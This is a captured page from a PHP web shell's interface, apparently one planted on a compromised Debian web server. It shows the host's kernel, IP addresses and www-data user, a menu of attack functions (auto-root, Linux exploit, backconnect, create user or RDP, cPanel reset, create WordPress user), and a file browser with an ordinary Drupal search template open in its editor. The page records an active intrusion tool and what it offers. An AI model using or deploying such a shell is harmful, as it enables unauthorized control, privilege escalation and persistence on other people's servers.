Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 3.145.202.60
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
baltic /
web /
modules /
search /
[ HOME SHELL ]
Name
Size
Permission
Action
tests
[ DIR ]
drwxr-xr-x
search-block-form.tpl.php
1.14
KB
-rw-r--r--
search-result.tpl.php
3.24
KB
-rw-r--r--
search-results.tpl.php
1.03
KB
-rw-r--r--
search-rtl.css
221
B
-rw-r--r--
search.admin.inc
7.52
KB
-rw-r--r--
search.api.php
12.72
KB
-rw-r--r--
search.css
564
B
-rw-r--r--
search.extender.inc
17.15
KB
-rw-r--r--
search.info
362
B
-rw-r--r--
search.install
5.21
KB
-rw-r--r--
search.module
50
KB
-rw-r--r--
search.pages.inc
5.5
KB
-rw-r--r--
search.test
78.74
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : search-block-form.tpl.php
<?php /** * @file * Displays the search form block. * * Available variables: * - $search_form: The complete search form ready for print. * - $search: Associative array of search elements. Can be used to print each * form element separately. * * Default elements within $search: * - $search['search_block_form']: Text input area wrapped in a div. * - $search['actions']: Rendered form buttons. * - $search['hidden']: Hidden form elements. Used to validate forms when * submitted. * * Modules can add to the search form, so it is recommended to check for their * existence before printing. The default keys will always exist. To check for * a module-provided field, use code like this: * @code * <?php if (isset($search['extra_field'])): ?> * <div class="extra-field"> * <?php print $search['extra_field']; ?> * </div> * <?php endif; ?> * @endcode * * @see template_preprocess_search_block_form() */ ?> <div class="container-inline"> <?php if (empty($variables['form']['#block']->subject)): ?> <h2 class="element-invisible"><?php print t('Search form'); ?></h2> <?php endif; ?> <?php print $search_form; ?> </div>
Close